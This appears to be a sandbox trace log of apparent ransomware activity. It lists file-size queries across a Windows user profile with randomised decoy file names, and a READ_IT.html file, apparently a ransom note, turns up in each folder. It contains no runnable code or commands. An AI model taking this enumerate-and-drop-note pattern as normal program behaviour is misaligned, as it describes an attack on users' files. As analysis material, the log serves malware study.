Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\L5W5AG34.png	type = size, size_out = 38096	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\mNI47gY8.jpg	type = size, size_out = 48649	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\t13iG5ENuTJ-qPeSi.bmp	type = size, size_out = 69602	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\W6pfO.bmp	type = size, size_out = 27375	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\xv87g_eB5_wmmMt.gif	type = size, size_out = 71331	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\1CHeMfy7 NjqW CZ2-.jpg	type = size, size_out = 29579	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\20pscY4eiNtD.bmp	type = size, size_out = 31105	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\READ_IT.html	type = file_attributes	20	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\5k_z7icfE.bmp	type = size, size_out = 45676	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\AXzS.bmp	type = size, size_out = 31423	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\bVnuTIRu.png	type = size, size_out = 66446	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\bYag45rCOLmmxmyin.png	type = size, size_out = 88170	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\EuOR.png	type = size, size_out = 50655	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\hP6 M97OYvSDIf9gVg.jpg	type = size, size_out = 35264	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\L4NdGUY34ih.gif	type = size, size_out = 79133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\l5I02B2iyCeNnq.gif	type = size, size_out = 40662	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\LGe1Fh5Wpy.bmp	type = size, size_out = 16233	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\O4AeQaMpJ.png	type = size, size_out = 93300	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\Pi8Yz0Gz9vOf3GFN4IPA.png	type = size, size_out = 12264	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\PUM C5 EO8GuRvQsK Q.png	type = size, size_out = 81690	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\rPPTHo8.bmp	type = size, size_out = 81840	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\s9Nds2xUYNwEt _S-wO.gif	type = size, size_out = 48471	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\sgHYdeAqpOmbl.png	type = size, size_out = 54760	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\SVECNQz.jpg	type = size, size_out = 19348	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\U5G0d.bmp	type = size, size_out = 19298	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\urdg 07FE.jpg	type = size, size_out = 57581	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\XiYf9-9V196.gif	type = size, size_out = 7087	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\C-i8QaJluhn9gm.mp3	type = size, size_out = 19391	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\ckT7-AE.m4a	type = size, size_out = 81515	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\READ_IT.html	type = file_attributes	13	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\desktop.ini	type = size, size_out = 504	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\EWZkiKK.wav	type = size, size_out = 49677	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\kfX_hFl afgz CCphF6M.m4a	type = size, size_out = 95667	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\L AqupJXv.m4a	type = size, size_out = 42159	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\NibX.mp3	type = size, size_out = 57479	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\pyQu8BmB KNqlRuQe.m4a	type = size, size_out = 76651	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\r3O1jCzIvgS-.mp3	type = size, size_out = 76016	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\rOdnZPK7V.wav	type = size, size_out = 22959	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\RtsLtclt.m4a	type = size, size_out = 14577	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\vAF0ydk gO1dF_Z.wav	type = size, size_out = 79883	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\VTfTWsBPNzMHn.m4a	type = size, size_out = 19518	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\zbcik6OtmH-.m4a	type = size, size_out = 29747	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\2DYiy8BvC1.wav	type = size, size_out = 21660	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\754eV 9 H9g6gb.wav	type = size, size_out = 88177	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\READ_IT.html	type = file_attributes	14	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\9tb-tPFVOb2uj9R.wav	type = size, size_out = 62529	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\gNAwN.m4a	type = size, size_out = 65213	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\I6Hp4-HY MkwGzm.mp3	type = size, size_out = 5646	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\Ia lSGWjh6c5U0B H.mp3	type = size, size_out = 72446	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\jIUn.wav	type = size, size_out = 95585	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\kS2_r71.mp3	type = size, size_out = 78346	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\L36FytEnJl.m4a	type = size, size_out = 18387	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\lLAOaa6e1cVocJ6VP.mp3	type = size, size_out = 12762	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\lPaNijrRt6q-RoAj m50.m4a	type = size, size_out = 14916	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\LQuKOV.wav	type = size, size_out = 41575	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\RU6bNn.mp3	type = size, size_out = 79098	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\Tf4wrU.mp3	type = size, size_out = 61688	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\z4nKiw5qLW-1.mp3	type = size, size_out = 58007	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\desktop.ini	type = size, size_out = 580	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\Desktop.lnk	type = size, size_out = 486	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\READ_IT.html	type = file_attributes	3	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\Downloads.lnk	type = size, size_out = 925	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\RecentPlaces.lnk	type = size, size_out = 363	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\desktop.ini	type = size, size_out = 402	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Get Windows Live.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Gallery.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\READ_IT.html	type = file_attributes	3	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Mail.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Spaces.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Autos.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Entertainment.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\READ_IT.html	type = file_attributes	5	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Money.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Sports.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSNBC News.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\IE Add-on site.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\IE site on Microsoft.com.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\READ_IT.html	type = file_attributes	4	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft At Home.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft At Work.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft Store.url	type = size, size_out = 134	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\desktop.ini	type = size, size_out = 80	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\Suggested Sites.url	type = size, size_out = 236	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\READ_IT.html	type = file_attributes	2	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\Web Slice Gallery.url	type = size, size_out = 226	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\ChromeSetup.exe	type = size, size_out = 1130328	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\desktop.ini	type = size, size_out = 282	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\0yzd1AF1TXI8bw.xlsx	type = size, size_out = 5915	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\4NeLGlgmC3gp9926cjXJ.pdf	type = size, size_out = 65808	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\READ_IT.html	type = file_attributes	30	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\8iuJAj-TJMwgMpxgt.xlsx	type = size, size_out = 44452	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\a2zN2i8e425ITp.pptx	type = size, size_out = 51388	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Brs2hg-mdiC176pMg3.docx	type = size, size_out = 25201	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\BSCI0Nbj_4h1m E.ppt	type = size, size_out = 97409	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\CEVp.pptx	type = size, size_out = 12523	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ClSQNOC.pptx	type = size, size_out = 62139	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\desktop.ini	type = size, size_out = 402	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\EcXY-g-QNVGVRke.csv	type = size, size_out = 21845	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\fOVrO73aJNtj25.docx	type = size, size_out = 43272	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\gOuzYN7OUc-v.pptx	type = size, size_out = 100572	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\hGZp56Gcx1rkrb_jQM.rtf	type = size, size_out = 15677	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\J8xelqpfMwhFwUdd1rt.pps	type = size, size_out = 101698	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\KpmFjxBCL _z_xv.xlsx	type = size, size_out = 69098	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\LorXOqQkVS6f-CJB3Y.pptx	type = size, size_out = 79769	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\lvlZfVQPqjkRs.xlsx	type = size, size_out = 76325	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\m3cKl.pptx	type = size, size_out = 97550	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\M9d60zrm69ZwPT.docx	type = size, size_out = 36566	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\N9kR1O8Sic34aaPindff.pptx	type = size, size_out = 45660	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Nu Wcixbhe 2upa1m.xlsx	type = size, size_out = 31658	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\OqsQkgPVws2KW2MpHE.pptx	type = size, size_out = 13320	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\qIuknaouCKsmM3Maz2V.rtf	type = size, size_out = 84088	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\s6260jDRMgooK.ods	type = size, size_out = 38535	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\sQKXNIbjSAzGvmyd0_f7.doc	type = size, size_out = 46841	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\TXfqtchH6vI5EBg.ods	type = size, size_out = 8479	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Uh0MOTMwnhM5QslZdVd.pptx	type = size, size_out = 52165	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\YT_fj.xls	type = size, size_out = 10631	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ZLfwPJ6yOGMDVqlfby.docx	type = size, size_out = 46808	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ZUZT.docx	type = size, size_out = 44323	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Zwzadzoagi.docx	type = size, size_out = 33166	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\-nbcCfzcdJQ2dV.doc	type = size, size_out = 75208	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\6iTDz.odt	type = size, size_out = 5499	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\READ_IT.html	type = file_attributes	9	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\9sLzlMyOCFuH.csv	type = size, size_out = 63570	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\DF4IZiIv.pdf	type = size, size_out = 35385	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\DMOsRy5Ljk1e.pps	type = size, size_out = 99463	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\FwX_09l7qc-etEisqd.pdf	type = size, size_out = 64112	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\nJPRm.rtf	type = size, size_out = 13787	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\nnLb8RrQDHzYuf.ots	type = size, size_out = 53107	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\y8GsAYdXEKW3KVw.xls	type = size, size_out = 77621	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\_lUS5mT.csv	type = size, size_out = 38159	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\4pMiQOPz.docx	type = size, size_out = 18346	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\9h2Uw8T.rtf	type = size, size_out = 4267	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\READ_IT.html	type = file_attributes	11	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\BdJci4eewA.csv	type = size, size_out = 79809	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\DD1sMMlGPoF6yRDJyx9.ots	type = size, size_out = 34989	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\e5i9jnq7jdi.doc	type = size, size_out = 66606	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\kZfCP7 _wOFu.csv	type = size, size_out = 38858	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\LbzcMZQLnz3pq.doc	type = size, size_out = 38149	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\lp4J8.xlsx	type = size, size_out = 79034	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\mOLcdbxRsE.csv	type = size, size_out = 30203	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\N5xQKlDg2wkPmIcJRs.ppt	type = size, size_out = 85000	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\Rdvc-2Q3oAz99.ots	type = size, size_out = 73386	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\sMAa1L-IqK.ppt	type = size, size_out = 34087	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Outlook Files\jvueuh@djeu.com.pst	type = size, size_out = 271360	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Outlook Files\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\desktop.ini	type = size, size_out = 216	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\Favorites.vss	type = size, size_out = 0	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\_private\folder.ico	type = size, size_out = 29926	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\_private\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\-lci4LWlsWG.mp4	type = size, size_out = 30967	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\1yykkWcOcMO1F.odp	type = size, size_out = 95736	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\READ_IT.html	type = file_attributes	30	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\69234490.doc	type = size, size_out = 76484	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\8uQGY6g-zZe55.wav	type = size, size_out = 75215	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\cgtxGTbWp T.mp3	type = size, size_out = 65937	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\CUp25E2.mp3	type = size, size_out = 37871	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\desktop.ini	type = size, size_out = 282	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\E80xfN6BEp.bmp	type = size, size_out = 54170	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\fwmoz.flv	type = size, size_out = 96776	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\GnTW32T.mkv	type = size, size_out = 64729	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\GvX_LajpHYJjfM.mp4	type = size, size_out = 10168	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\HdUfR3zPYGx.mp3	type = size, size_out = 23266	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\igCOsJDRZ4j2G1IZw.mp3	type = size, size_out = 84257	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\jgRzkhn.wav	type = size, size_out = 91488	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\L9PmyHtkERxj.m4a	type = size, size_out = 18872	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\NKSXW.flv	type = size, size_out = 89031	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\Nyr8aiKjyEFl.flv	type = size, size_out = 18513	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\o3YC8FdDp.flv	type = size, size_out = 83075	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\p8fQECmj7Fl OF85VPf.flv	type = size, size_out = 4489	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\R-vsD.m4a	type = size, size_out = 68917	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\S0BfBv4vm.mp4	type = size, size_out = 95310	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\TQbrwrS.m4a	type = size, size_out = 50738	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\Ue-5ySQ.png	type = size, size_out = 38031	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\wDgOCV.wav	type = size, size_out = 43143	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\XGIwR5NL7Yf.mkv	type = size, size_out = 82190	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\xVd4Iv6FFRlHm-y.avi	type = size, size_out = 2606	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\XygQlHZL_mJ.jpg	type = size, size_out = 98037	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\yVOJ0 snGOZEZV.wav	type = size, size_out = 77293	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\zmhb.flv	type = size, size_out = 30537	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\ZXoBFBOcUzmMPH9OMtZs.m4a	type = size, size_out = 101819	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\_bryI2jV2VxGI68s0d.odt	type = size, size_out = 94306	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\-RTPz3hqk.jpg	type = size, size_out = 99095	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\4rUxzvGW0OpQV4gw u5n.flv	type = size, size_out = 89775	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\READ_IT.html	type = file_attributes	3	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\BXbEGs1IeVQlccK0F.m4a	type = size, size_out = 46901	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\JvRr.avi	type = size, size_out = 55059	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\3u3u7kCTHK.gif	type = size, size_out = 58363	1	Fn
